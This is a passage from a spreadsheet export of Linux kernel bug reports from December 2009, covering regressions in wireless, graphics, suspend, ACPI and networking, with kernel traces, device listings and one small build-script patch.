iwl-phy0::RX Dec 6 19:51:38 cellardoor kernel: Registered led device: iwl-phy0::TX Dec 6 19:51:38 cellardoor kernel: ADDRCONF(NETDEV_UP): wlan0: link is not ready Dec 6 19:51:38 cellardoor avahi-daemon[1175]: Withdrawing address record for fe80::21b:24ff:fe84:622d on eth0. Dec 6 19:51:38 cellardoor kernel: ------------[ cut here ]------------ Dec 6 19:51:38 cellardoor kernel: WARNING: at net/mac80211/scan.c:267 ieee80211_scan_completed+0x25d/0x270() Dec 6 19:51:38 cellardoor kernel: Hardware name: HP Pavilion dv6500 Notebook PC Dec 6 19:51:38 cellardoor kernel: Modules linked in: ipv6 joydev fuse btusb bluetooth uvcvideo snd_hda_codec_si3054 snd_hda_codec_realtek snd_seq_dummy snd_hda_intel snd_seq_oss snd_seq_midi_event snd_hda_codec snd_seq snd_seq_device snd_hwdep iTCO_wdt r8169 snd_pcm_oss snd_pcm snd_timer snd_mixer_oss sdhci_pci ohci1394 uhci_hcd ehci_hcd video psmouse sdhci ricoh_mmc ieee1394 snd_page_alloc mii iTCO_vendor_support ac battery intel_agp output snd usbcore serio_raw nvidia(P) evdev ide_cd_mod button thermal coretemp cpufreq_powersave acpi_cpufreq processor rtc_cmos Dec 6 19:51:38 cellardoor kernel: Pid: 2235, comm: wpa_supplicant Tainted: P AW 2.6.32-ARCH #3 Dec 6 19:51:38 cellardoor kernel: Call Trace: Dec 6 19:51:38 cellardoor kernel: [&lt;c103953e&gt;] ? warn_slowpath_common+0x6e/0xb0 Dec 6 19:51:38 cellardoor kernel: [&lt;c13aa7ad&gt;] ? ieee80211_scan_completed+0x25d/0x270 Dec 6 19:51:38 cellardoor kernel: [&lt;c1039593&gt;] ? warn_slowpath_null+0x13/0x20 Dec 6 19:51:38 cellardoor kernel: [&lt;c13aa7ad&gt;] ? ieee80211_scan_completed+0x25d/0x270 Dec 6 19:51:38 cellardoor kernel: [&lt;c13b2696&gt;] ? ieee80211_stop+0x526/0x540 Dec 6 19:51:38 cellardoor kernel: [&lt;c1050940&gt;] ? wakeme_after_rcu+0x0/0x10 Dec 6 19:51:38 cellardoor kernel: [&lt;c13dc7f8&gt;] ? _spin_lock_bh+0x8/0x30 Dec 6 19:51:38 cellardoor kernel: [&lt;c132d64e&gt;] ? dev_deactivate+0x15e/0x170 Dec 6 19:51:38 cellardoor kernel: [&lt;c131c6cb&gt;] ? dev_close+0x5b/0xb0 Dec 6 19:51:38 cellardoor kernel: [&lt;c1319b60&gt;] ? dev_set_rx_mode+0x20/0x40 Dec 6 19:51:38 cellardoor kernel: [&lt;c131bfb0&gt;] ? dev_change_flags+0x80/0x1a0 Dec 6 19:51:38 cellardoor kernel: [&lt;c1368e4c&gt;] ? devinet_ioctl+0x6dc/0x770 Dec 6 19:51:38 cellardoor kernel: [&lt;c1318ae5&gt;] ? __dev_get_by_name+0x75/0x90 Dec 6 19:51:38 cellardoor kernel: [&lt;c130ab45&gt;] ? sock_ioctl+0x65/0x260 Dec 6 19:51:38 cellardoor kernel: [&lt;c130aae0&gt;] ? sock_ioctl+0x0/0x260 Dec 6 19:51:38 cellardoor kernel: [&lt;c10de4db&gt;] ? vfs_ioctl+0x1b/0xa0 Dec 6 19:51:38 cellardoor kernel: [&lt;c10de6d9&gt;] ? do_vfs_ioctl+0x79/0x5d0 Dec 6 19:51:38 cellardoor kernel: [&lt;c130c897&gt;] ? sys_send+0x37/0x40 Dec 6 19:51:38 cellardoor kernel: [&lt;c130d5b4&gt;] ? sys_socketcall+0x1d4/0x2a0 Dec 6 19:51:38 cellardoor kernel: [&lt;c10deca6&gt;] ? sys_ioctl+0x76/0x90 Dec 6 19:51:38 cellardoor kernel: [&lt;c1003993&gt;] ? sysenter_do_call+0x12/0x28 Dec 6 19:51:38 cellardoor kernel: ---[ end trace 7b8c9786145ceb92 ]---</t>
  </si>
  <si>
    <t>181a533 is causing severe screen flickering on 965GM</t>
  </si>
  <si>
    <t>2009-12-10 08:49 UTC</t>
  </si>
  <si>
    <t>benisty.e</t>
  </si>
  <si>
    <t>2010-04-07 14:58 UTC</t>
  </si>
  <si>
    <t>Created attachment 24128 [details] Xorg log Hi, Commit 181a5336d6cc836f05507410d66988c483ad0154 drm/i915: Fix render reclock availability detection. is causing screen flickering on some intel chipsets in X. Reverting this commit solves the issue.</t>
  </si>
  <si>
    <t>Suspend hangs with SD card inserted</t>
  </si>
  <si>
    <t>2009-12-10 18:53 UTC</t>
  </si>
  <si>
    <t>Gary Trakhman</t>
  </si>
  <si>
    <t>This is my strange experience. Running Ubuntu Karmic. all 2.6.31 kernels work fine. When I began testing 2.6.32 rc's from git, my system would hang during the second suspend. First one always worked. This occurs with -zen and ubuntu mainline ppa kernels. Screen displays whatever was happening at the time. When it occurs, I must power off by holding down power for 4 seconds. Here's a link to the ubuntu bug report, that has all my system information. https://bugs.launchpad.net/ubuntu/+source/linux/+bug/492684</t>
  </si>
  <si>
    <t>Unhandled IRQ on Thinkpad R61i: "irq 16: nobody cared"</t>
  </si>
  <si>
    <t>2009-12-10 19:14 UTC</t>
  </si>
  <si>
    <t>Stefan Zegenhagen</t>
  </si>
  <si>
    <t>2010-02-01 15:07 UTC</t>
  </si>
  <si>
    <t>Hi everyone, while running a vanilla kernel 2.6.32 on my Thinkpad R61i, I get the following after a while. Since AHCI, video and USB are affected, the system becomes almost unusable. Same behaviour does not occur with kernel 2.6.31.6. I've no idea, which part of the hardware causes the IRQ storm [and no time to test]. I've found no way to really reproduce the bug, it just happens sooner or later. I'm running i386 Linux on a Core2 Duo T2310 @ 1.46GHz. Device inventory (lspci -vv) attached. --- snip --- irq 16: nobody cared (try booting with the "irqpoll" option) Pid: 0, comm: swapper Not tainted 2.6.32 #2 Call Trace: [&lt;c10627e4&gt;] ? __report_bad_irq+0x24/0x90 [&lt;c10629a2&gt;] ? note_interrupt+0x152/0x190 [&lt;c10630eb&gt;] ? handle_fasteoi_irq+0xab/0xd0 [&lt;c10057f7&gt;] ? handle_irq+0x17/0x20 [&lt;c1004e3c&gt;] ? do_IRQ+0x4c/0xc0 [&lt;c105036d&gt;] ? tick_notify+0x1ed/0x3c0 [&lt;c1356d9e&gt;] ? _spin_unlock_irqrestore+0xe/0x30 [&lt;c105036d&gt;] ? tick_notify+0x1ed/0x3c0 [&lt;c11baeea&gt;] ? acpi_hw_read_port+0x23/0x71 [&lt;c1003529&gt;] ? common_interrupt+0x29/0x30 [&lt;c1003529&gt;] ? common_interrupt+0x29/0x30 [&lt;c104007b&gt;] ? worker_thread+0xcb/0x1e0 [&lt;c1356d94&gt;] ? _spin_unlock_irqrestore+0x4/0x30 [&lt;c11c9c0c&gt;] ? acpi_idle_enter_bm+0x29b/0x2b1 [&lt;c1296475&gt;] ? cpuidle_idle_call+0x85/0xd0 [&lt;c1001f45&gt;] ? cpu_idle+0x55/0x90 [&lt;c148779f&gt;] ? start_kernel+0x24c/0x285 [&lt;c1487344&gt;] ? unknown_bootoption+0x0/0x1c1 handlers: [&lt;c1272210&gt;] (ahci_interrupt+0x0/0x530) [&lt;f86fc980&gt;] (yenta_interrupt+0x0/0xf0 [yenta_socket]) [&lt;f8456ef0&gt;] (usb_hcd_irq+0x0/0x60 [usbcore]) [&lt;c120fe60&gt;] (i915_driver_irq_handler+0x0/0x530) Disabling IRQ #16 --- snip ---</t>
  </si>
  <si>
    <t>Regression in 9f15226e7 (x86, ucode-amd: Ensure ucode update on suspend/resume after CPU off/online cycle)</t>
  </si>
  <si>
    <t>2009-12-11 00:50 UTC</t>
  </si>
  <si>
    <t>As of commit 9f15226e my ThinkPad X61 tablet won't resume from suspend to ram. All I see is a blinking cursor when I try to resume.</t>
  </si>
  <si>
    <t>No network interface using Kernel 2.6.31</t>
  </si>
  <si>
    <t>2009-12-12 12:36 UTC</t>
  </si>
  <si>
    <t>2012-05-14 15:54 UTC</t>
  </si>
  <si>
    <t>I have no network interface (except lo) while using Kernel 2.6.31. The interfaces available only when I use acpi=off parameter. Here's my lspci output: 00:00.0 Host bridge: Intel Corporation Mobile 4 Series Chipset Memory Controller Hub (rev 07) 00:01.0 PCI bridge: Intel Corporation Mobile 4 Series Chipset PCI Express Graphics Port (rev 07) 00:1a.0 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #4 (rev 03) 00:1a.1 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #5 (rev 03) 00:1a.7 USB Controller: Intel Corporation 82801I (ICH9 Family) USB2 EHCI Controller #2 (rev 03) 00:1b.0 Audio device: Intel Corporation 82801I (ICH9 Family) HD Audio Controller (rev 03) 00:1c.0 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 1 (rev 03) 00:1c.1 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 2 (rev 03) 00:1c.5 PCI bridge: Intel Corporation 82801I (ICH9 Family) PCI Express Port 6 (rev 03) 00:1d.0 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #1 (rev 03) 00:1d.1 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #2 (rev 03) 00:1d.2 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #3 (rev 03) 00:1d.3 USB Controller: Intel Corporation 82801I (ICH9 Family) USB UHCI Controller #6 (rev 03) 00:1d.7 USB Controller: Intel Corporation 82801I (ICH9 Family) USB2 EHCI Controller #1 (rev 03) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 93) 00:1f.0 ISA bridge: Intel Corporation ICH9M LPC Interface Controller (rev 03) 00:1f.2 SATA controller: Intel Corporation ICH9M/M-E SATA AHCI Controller (rev 03) 00:1f.3 SMBus: Intel Corporation 82801I (ICH9 Family) SMBus Controller (rev 03) 01:00.0 VGA compatible controller: nVidia Corporation G96 [GeForce GT 130M] (rev a1) 05:00.0 Network controller: Intel Corporation Wireless WiFi Link 5100 09:00.0 Ethernet controller: Attansic Technology Corp. Device 1063 (rev c0) And I've a bug for Kernel 2.6.30 that can be related to this bug: http://bugzilla.kernel.org/show_bug.cgi?id=14336 Regards..</t>
  </si>
  <si>
    <t>Something has been broken in the network stack this week</t>
  </si>
  <si>
    <t>after 2.6.32</t>
  </si>
  <si>
    <t>2009-12-12 13:06 UTC</t>
  </si>
  <si>
    <t>Delete This Account</t>
  </si>
  <si>
    <t>2010-02-07 21:41 UTC</t>
  </si>
  <si>
    <t>Created attachment 24161 [details] dmesg and lspci outputs Apparently something has been broken in the network stack this week Hi. This is my first bug/issue report, so understand any mistake or n00b thing I make here. And sorry for the bad english ;) It looks like that from the 2.6.32 release, to the git commit 2.6.32-05254-g3067e02 (i've compiled it in Dec 10 11:39:26 (Brazilian TZ) 2009), something weird happened ;) I've used the USB_NET_CDCETHER for 2 years now, and it always worked. But when I rebooted to my new kernel 2.6.32-05254-g3067e02, from the 2.6.32, it just dont get connected. [ 16.683465] ADDRCONF(NETDEV_UP): eth1: link is not ready [ 94.854539] ADDRCONF(NETDEV_UP): eth1: link is not ready There's no symptom of anything wrong. And even restarting the modem and then reconnecting the USB cable, it does'nt work. Then I reboot to the 2.6.32 one, and it takes just one dhclient command and 1 second to be online again. ---- output of: sh scripts/ver_linux Linux speedyb0y 2.6.32speedyb0y-05254-g3067e02 #3 PREEMPT Thu Dec 10 11:39:26 BRST 2009 i686 GNU/Linux Gnu C 4.4.2 Gnu make 3.81 binutils 2.20 util-linux 2.16.2 mount support module-init-tools 3.11 e2fsprogs 1.41.9 reiserfsprogs 3.6.21 PPP 2.4.4 Linux C Library 2.10.2 Dynamic linker (ldd) 2.10.2 Procps 3.2.8 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 8.1 Modules Loaded nfsd lockd nfs_acl auth_rpcgss sunrpc exportfs binfmt_misc cdc_ether usbnet ---- output of: cat /proc/version Linux version 2.6.32speedyb0y-05254-g3067e02 (speedyb0y@speedyb0y) (gcc version 4.4.2 (Debian 4.4.2-3) ) #3 PREEMPT Thu Dec 10 11:39:26 BRST 2009</t>
  </si>
  <si>
    <t>ath5k + hostapd causes flood of interrupts</t>
  </si>
  <si>
    <t>2009-12-13 20:57 UTC</t>
  </si>
  <si>
    <t>Bartek Knapek</t>
  </si>
  <si>
    <t>2010-03-03 16:45 UTC</t>
  </si>
  <si>
    <t>I am running a home wireless router on Slackware 13.0 / 2.6.29.6-smp. WPA2 and g only. Athlon 2400+ (single-core CPU) / Asus A7N8X-X. The wireless device is Planet WL-8310 (Atheros AR5213A). madwifi 0.9.4 + hostapd 0.6.9 work fine. I try to migrate to ath5k. Initially I have used a patch to introduce the AP mode support into ath5k from my kernel, but after having started hostapd the kernel was complaining about "ath5k phy0: beacon queue 7 didn't stop", and besides the AP was not stable: hard to connect, then dropping the connections at random intervals. So I have upgraded compat-wireless to 2.6.32. I no longer see the "beacon queue" message in the logs, but the AP is still not stable. From the server perspective I see that the system chokes. Runs fine a couple of seconds, then everything goes very slow for a couple of seconds, and so on. On "top" I see that the software interrupts (si) figure changes between 30-90%. With madwifi it is usually 0-3%. I have checked /proc/interrupts and calculated the delta increase, every 1 second, of the interrupts the wireless device is using (loop: cat /proc/interrupt &gt;&gt; file ; sleep 1). This is the only device on this interrupt. The following pattern repeats all the time (the exact values differ of course): new interrupts related to wireless device, every 1s : 91 41 5 445 1059 1181 1229 1493 909 7 3 4 615 : Using madwifi the number of new interrupts every second is always ~60. Also the Local timer interrupts are affected: : 1350 1018 1018 1018 1361 2575 1078 1017 1018 1328 : With madwifi it is always ~1018. The peaks in Local timer interrupts are not correlated with the peak of wireless device interrupts. I have set kernel debug to 8 (sysrq), but seen nothing, until after some 1-2 hours the following appeared: ath5k phy0: failed to warm reset the MAC Chip ath5k phy0: can't reset hardware (-5) I though it might be related to Bug#12647, so I have applied Patch#20356, but it did not help. It is 100% reproducable. I can provide traces, but you need to tell me what is of interest to you.</t>
  </si>
  <si>
    <t>b43 fails w/ latest git (ERROR: Microcode not responding)</t>
  </si>
  <si>
    <t>2009-12-13 22:32 UTC</t>
  </si>
  <si>
    <t>2009-12-15 19:50 UTC</t>
  </si>
  <si>
    <t>hkmaly</t>
  </si>
  <si>
    <t>mkspec assumes rpm tmppath is /var/tmp</t>
  </si>
  <si>
    <t>2009-12-15 06:35 UTC</t>
  </si>
  <si>
    <t>John Saalwaechter</t>
  </si>
  <si>
    <t>2012-06-18 13:18 UTC</t>
  </si>
  <si>
    <t>scripts/package/mkspec hard codes /var/tmp into the BuildRoot in its spec file. This breaks "make rpm-pkg" when the user has changed _tmppath. Proposed fix: --- scripts/package/mkspec.orig 2009-12-15 06:30:42.000000000 +0000 +++ scripts/package/mkspec 2009-12-15 06:30:58.000000000 +0000 @@ -39,7 +39,7 @@ echo "Source: kernel-$__KERNELRELEASE.tar.gz" fi -echo "BuildRoot: /var/tmp/%{name}-%{PACKAGE_VERSION}-root" +echo "BuildRoot: %{_tmppath}/%{name}-%{PACKAGE_VERSION}-root" echo "Provides: $PROVIDES" echo "%define __spec_install_post /usr/lib/rpm/brp-compress || :" echo "%define debug_package %{nil}"</t>
  </si>
  <si>
    <t>dynamic tables aren't loaded early enough</t>
  </si>
  <si>
    <t>2009-12-17 00:43 UTC</t>
  </si>
  <si>
    <t>Alex Chiang</t>
  </si>
  <si>
    <t>2010-09-13 20:51 UTC</t>
  </si>
  <si>
    <t>Created attachment 24211 [details] dmesg New HP Envy notebook (core i7) with latest production F.06 BIOS. Encountering an error while initializing the ambient light sensor on the EC. During initialization, that object references a non-existent method. This method is actually defined in a dynamic table loaded later. Triaged down to the point where we know that \_PR_.CPU0._PDC is the method that contains the Load statement that then defines the missing method. http://pastebin.com/f3b00122a Lines 25--28 indicate the error. On lines 43,44, and 53,54, we see the dynamic tables get loaded. Those come from a Load in the _PDC method. The dynamic table named ApIst (line 53) contains the definition of \_PR_.CPU0._PPC. This bug is very similar to http://bugzilla.kernel.org/show_bug.cgi?id=14710 but the thermal zone and fans actually work on this machine.</t>
  </si>
  <si>
    <t>acerhdf: unknown (unsupported) BIOS version Acer/TravelMate 290 /V2.00</t>
  </si>
  <si>
    <t>2009-12-18 17:44 UTC</t>
  </si>
  <si>
    <t>Created attachment 24224 [details] dmesg-2.6.32 [ 5.598709] acerhdf: Acer Aspire One Fan driver, v.0.5.18 [ 5.598723] acerhdf: unknown (unsupported) BIOS version Acer/TravelMate 290 /V2.00, please report, aborting! [ 5.722353] irda_init() [ 5.722795] NET: Registered protocol family 23 [ 5.817834] [Firmware Bug]: ACPI: ACPI brightness control misses _BQC function [ 5.818889] acpi device:04: registered as cooling_device1 [ 5.819612] input: Video Bus as /devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A03:00/LNXVIDEO:00/input/input10 [ 5.819974] ACPI: Video Device [GFX0] (multi-head: yes rom: yes post: no) I will attach the full dmesg and .config. This is Acer Travelmate 291Lci model with i855GM graphics board, latest BIOS.</t>
  </si>
  <si>
    <t>X11 screen black after resume, only mouse pounter is seen</t>
  </si>
  <si>
    <t>2.6.32.[12]</t>
  </si>
  <si>
    <t>2009-12-19 10:56 UTC</t>
  </si>
  <si>
    <t>2010-01-07 20:17 UTC</t>
  </si>
  <si>
    <t>After s2ram and wakeup I'm faced with that. I can press Alt+F12 but there's nothing suspicous to read. If I press Ctrl+Alt+Backspace I'm on the kdm login again. The issue however still appear if I login into a simple X11 session (from kdm BTW).</t>
  </si>
  <si>
    <t>No more wireless interface eth1 after boot</t>
  </si>
  <si>
    <t>2.6.33-rc1</t>
  </si>
  <si>
    <t>2009-12-19 16:33 UTC</t>
  </si>
  <si>
    <t>2010-01-10 22:18 UTC</t>
  </si>
  <si>
    <t>Kernel 2.6.33-rc1 64bits with kmemcheck and other debug options Athlon64 3GHz single core Acer Aspire 1511LMi Bluewhite 64 13 (32 bits port of Slackware) Broadcom wireless interface Since 2.6.33-rc1, I cannot configure any network interface, because they are not created anymore. On my laptop, I have a built in eth0 Ethernet port (tg3), and a wireless wlan0 port. When I boot, wlan0 is renamed to eth1 by udev, then the interfaces are brought up by /etc/rc.d scripts (slackware based). dmesg says that at boot: b43 ssb0:0: firmware: requesting b43/ucode5.fw b43 ssb0:0: firmware: requesting b43/pcm5.fw b43 ssb0:0: firmware: requesting b43/b0g0initvals5.fw b43 ssb0:0: firmware: requesting b43/b0g0bsinitvals5.fw b43-phy0: Loading firmware version 478.104 (2008-07-01 00:50:23) b43-phy0 ERROR: Failed to allocate or map pages for DMA ringmemory b43-phy0 ERROR: Microcode not responding b43-phy0 ERROR: You must go to http://wireless.kernel.org/en/users/Drivers/b43#devicefirmware and download the correct firmware for this driver version. Please carefully read all instructions on this website. b43-phy0: Loading firmware version 478.104 (2008-07-01 00:50:23) b43-phy0 ERROR: Failed to allocate or map pages for DMA ringmemory b43-phy0 ERROR: Microcode not responding b43-phy0 ERROR: You must go to http://wireless.kernel.org/en/users/Drivers/b43#devicefirmware and download the correct firmware for this driver version. Please carefully read all instructions on this website. Of course I have the latest firmware. If I do ifconfig /all, I get an error message telling it is unable to scan the network interface lists. However, if I issue iwconfig, I can see wlan0 (which therefore has not been renamed to eth1 as expected). In syslog, I got the following errors: Dec 19 15:38:33 athor dhcpcd[3176]: eth1: ioctl SIOCSIFFLAGS: No such device Dec 19 15:45:32 athor dnsmasq[3360]: failed to access /var/dhcp/resolv.conf.eth1: No such file or directory Dec 19 15:50:12 athor dhcpcd[3475]: eth1: dhcpcd not running I haven't checked if I could associate and configure the wlan0 interface.</t>
  </si>
  <si>
    <t>acer-wmi kernel OOPS, cannot create duplicit sysfs name</t>
  </si>
  <si>
    <t>2009-12-19 23:44 UTC</t>
  </si>
  <si>
    <t>Created attachment 24234 [details] dmesg output The boot fails completely (no usable trace) when the acer-wmi+wmi is in-kernel. I've compiled it as module, so here is the trace extract (full trace included): [ 86.439943] WARNING: at fs/sysfs/dir.c:477 sysfs_add_one+0x65/0x7a() [ 86.439951] Hardware name: TravelMate 5730 [ 86.439957] sysfs: cannot create duplicate filename '/devices/virtual/wmi/05901221-D566-11D1-B2F0-00A0C9062910'</t>
  </si>
  <si>
    <t>therm_adt746x might have inverted fan speed logic</t>
  </si>
  <si>
    <t>2009-12-21 04:49 UTC</t>
  </si>
  <si>
    <t>Patrick McFarland</t>
  </si>
  <si>
    <t>I just recently upgraded to .32 from .31 on my Powerbook 5,2. The fans worked properly, as in, when it got warm it turned the fans on, when it got cold, it turns the fans off. However, .32 now turns the fans on soon as therm_adt746x is loaded, the fans crank up to full throttle, even though the temperatures are at least 10 degrees below sensor1_limit and sensor2_limit in /sys/devices/temperatures. Trying to manually set the limits with echo -n foo &gt; sensorn_limit to 20 degrees cooler (as opposed to warmer) causes the fans to shut off, but after several minutes the box halts and powers off (probably triggering some safety limit to prevent hardware damage). I'm not sure how sensorn_fan_speed works, but the fans are at the their fastest at 0, and medium speed at 91, and stopped altogether at 255.</t>
  </si>
  <si>
    <t>ACPI events on T20 thinkpad stop being reported</t>
  </si>
  <si>
    <t>2009-12-21 17:48 UTC</t>
  </si>
  <si>
    <t>florz</t>
  </si>
  <si>
    <t>2010-01-25 09:20 UTC</t>
  </si>
  <si>
    <t>I have here a T20 thinkpad with a T22 BIOS and a 2.6.32 kernel. After boot, acpi_listen shows me all the events that are being generated by the lid switch, hotkeys, batteries, ac, and maybe more. However, when I disconnect and reconnect ac power a few times in rapid succession, that leads to all of these events not being reported anymore. Suspend to RAM and to disk both don't fix it, only a reboot does. The BIOS and EC firmware are the newest versions available (1.12 and 1.06, respectively). "Commit 2a84cb removed delay needed by some slow controllers (Acer TM4001)" did not solve it. Whether this is a regression is unknown, which I cannot select in the interface. However, Debian's 2.6.25-2-686 kernel is affected, too.</t>
  </si>
  <si>
    <t>No DP-DVI output when laptop is docked</t>
  </si>
  <si>
    <t>2009-12-21 21:02 UTC</t>
  </si>
  <si>
    <t>Pär Lindfors</t>
  </si>
  <si>
    <t>2010-01-24 21:53 UTC</t>
  </si>
  <si>
    <t>I have a Lenovo x200s with integrated Intel Graphics: 00:02.0 VGA compatible controller: Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller (rev 07) The "Ultrabase" docking station have a DisplayPort, where I have connected a DVI-D monitor using a DP-DVI cable. The dock also have a VGA monitor connected to the VGA port. The following commit causes a regression: commit fc816655236cd9da162356e96e74c7cfb0834d92 Author: Zhao Yakui &lt;yakui.zhao@intel.com&gt; Date: Tue Nov 24 09:48:45 2009 +0800 drm/i915: Don't set up HDMI ports that aren't in the BIOS device table. Use the child device array to decide whether the given HDMI output should be initialized. If the given HDMI port can't be found in child device array, it is not present and won't be initialized. Signed-off-by: Zhao Yakui &lt;yakui.zhao@intel.com&gt; Signed-off-by: Eric Anholt &lt;eric@anholt.net&gt; After this the DVI-monitor is not recognized as connected when I put the laptop into the dock. LVDS and VGA still works. If I reboot the laptop while still docked the output works, and is named "HDMI1". Reverting commit fc816655236cd9da162356e96e74c7cfb0834d92 makes the output work ok again. After booting undocked LVDS1 is connected and VGA1,HDMI1,HDMI2,DP1 unconnected. Docking results in VGA1 and HDMI2 beeing connected and working, so now the DP-port is now HDMI2. xrandr outputs: # Booting undocked. output after putting laptop in the dock: paran@faran:~$ xrandr Screen 0: minimum 320 x 200, current 2720 x 1024, maximum 8192 x 8192 VGA1 connected 1280x1024+1440+0 (normal left inverted right x axis y axis) 376mm x 301mm 1280x1024 60.0*+ 75.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 LVDS1 connected 1440x900+0+0 (normal left inverted right x axis y axis) 261mm x 163mm 1440x900 50.0*+ 59.9 1360x768 59.8 1152x864 100.0 85.1 85.0 75.0 75.0 70.0 60.0 1024x768 85.0 75.0 70.1 60.0 832x624 74.6 800x600 85.1 72.2 75.0 60.3 56.2 640x480 85.0 72.8 75.0 59.9 720x400 85.0 640x400 85.1 640x350 85.1 DP1 disconnected (normal left inverted right x axis y axis) # After booting with laptop in the dock: paran@faran:~$ xrandr Screen 0: minimum 320 x 200, current 1152 x 864, maximum 8192 x 8192 VGA1 connected (normal left inverted right x axis y axis) 1280x1024 60.0 + 75.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 LVDS1 connected 1152x864+0+0 (normal left inverted right x axis y axis) 261mm x 163mm 1440x900 50.0 + 59.9 1360x768 59.8 1152x864 100.0 85.1 85.0 75.0* 75.0 70.0 60.0 1024x768 85.0 75.0 70.1 60.0 832x624 74.6 800x600 85.1 72.2 75.0 60.3 56.2 640x480 85.0 72.8 75.0 59.9 720x400 85.0 640x400 85.1 640x350 85.1 HDMI1 connected 1152x864+0+0 (normal left inverted right x axis y axis) 367mm x 275mm 1600x1200 60.0 + 1280x1024 75.0 60.0 1152x864 75.0* 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 paran@faran:~$ # Commit fc816655236cd9da162356e96e74c7cfb0834d92 reverted, after booting undocked: paran@faran:~$ xrandr Screen 0: minimum 320 x 200, current 1440 x 900, maximum 8192 x 8192 VGA1 disconnected (normal left inverted right x axis y axis) LVDS1 connected 1440x900+0+0 (normal left inverted right x axis y axis) 261mm x 163mm 1440x900 50.0*+ 59.9 1360x768 59.8 1152x864 100.0 85.1 85.0 75.0 75.0 70.0 60.0 1024x768 85.0 75.0 70.1 60.0 832x624 74.6 800x600 85.1 72.2 75.0 60.3 56.2 640x480 85.0 72.8 75.0 59.9 720x400 85.0 640x400 85.1 640x350 85.1 HDMI1 disconnected (normal left inverted right x axis y axis) HDMI2 disconnected (normal left inverted right x axis y axis) DP1 disconnected (normal left inverted right x axis y axis) # Commit fc816655236cd9da162356e96e74c7cfb0834d92 reverted, after booting undocked and then putting the laptop into the dock: paran@faran:~$ xrandr Screen 0: minimum 320 x 200, current 1600 x 1200, maximum 8192 x 8192 VGA1 connected 1280x1024+0+0 (normal left inverted right x axis y axis) 376mm x 301mm 1280x1024 60.0*+ 75.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 LVDS1 connected (normal left inverted right x axis y axis) 1440x900 50.0 + 59.9 1360x768 59.8 1152x864 100.0 85.1 85.0 75.0 75.0 70.0 60.0 1024x768 85.0 75.0 70.1 60.0 832x624 74.6 800x600 85.1 72.2 75.0 60.3 56.2 640x480 85.0 72.8 75.0 59.9 720x400 85.0 640x400 85.1 640x350 85.1 HDMI1 disconnected (normal left inverted right x axis y axis) HDMI2 connected 1600x1200+0+0 (normal left inverted right x axis y axis) 367mm x 275mm 1600x1200 60.0*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 DP1 disconnected (normal left inverted right x axis y axis)</t>
  </si>
  <si>
    <t>Resume from suspend fails on intel 4965 AGN</t>
  </si>
  <si>
    <t>2.6.32.1</t>
  </si>
  <si>
    <t>2009-12-23 02:50 UTC</t>
  </si>
  <si>
    <t>Javier Jardón</t>
  </si>
  <si>
    <t>2010-01-04 19:35 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu Lucid Kernel version: 2.6.32.9.9 Environment used for testing: Dell XPS 1330 (All Intel) All the info (lspci, dmesg....) are attached in the downstream bug report: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/499221 I mark this as a regression because I have karmic installed too (2.6.31.16.29 kernel) and suspend/resume works.</t>
  </si>
  <si>
    <t>flood of "don't try to register things with the same name in the same directory." on upgrade to 2.6.32</t>
  </si>
  <si>
    <t>2009-12-24 02:44 UTC</t>
  </si>
  <si>
    <t>2010-10-26 09:24 UTC</t>
  </si>
  <si>
    <t>Was running 2.6.31 vanilla on Fedora 10, upgraded to vanilla 2.6.32, dmesg started getting flooded with messages of the form [see attachment 1 [details]]: ------------[ cut here ]------------ WARNING: at fs/sysfs/dir.c:491 sysfs_add_one+0x100/0x117() Hardware name: sysfs: cannot create duplicate filename '/devices/virtual/bdi/0:32' Modules linked in: autofs4 coretemp hwmon nfs lockd nfs_acl auth_rpcgss sunrpc cachefiles fscache ipv6 cpufreq_ondemand acpi_cpufreq freq_table kvm_intel kvm snd_hda_intel snd_hda_codec snd_seq_dummy snd_seq_oss snd_usb_audio snd_seq_midi_event snd_seq snd_usb_lib uvcvideo ppdev firewire_ohci firewire_core snd_pcm_oss snd_mixer_oss crc_itu_t pcspkr snd_rawmidi videodev v4l1_compat v4l2_compat_ioctl32 i2c_i801 snd_pcm i2c_core snd_seq_device usb_storage iTCO_wdt iTCO_vendor_support snd_hwdep snd_timer parport_pc snd parport e1000e i82975x_edac edac_core soundcore snd_page_alloc raid1 [last unloaded: scsi_wait_scan] Pid: 20581, comm: mount.nfs Tainted: G W 2.6.32-fun #1 ... ---[ end trace b4d582dc9db911d1 ]--- kobject_add_internal failed for 0:32 with -EEXIST, don't try to register things with the same name in the same directory. Pid: 20581, comm: mount.nfs Tainted: G W 2.6.32-fun #1 ... The system is indeed using autofs, so I'd blame NFS-mounts from FreeBSD for this, but it wasn't cropping up in 2.6.31. I've also attached the .config for the 2.6.31 and 2.6.32 kernels, in case it's something stupid I missed.</t>
  </si>
  <si>
    <t>Ath5k regression with commit 8bf3d79bc401ca417ccf9fc076d3295d1a71dbf5</t>
  </si>
  <si>
    <t>2009-12-25 00:49 UTC</t>
  </si>
  <si>
    <t>2010-01-24 21:56 UTC</t>
  </si>
  <si>
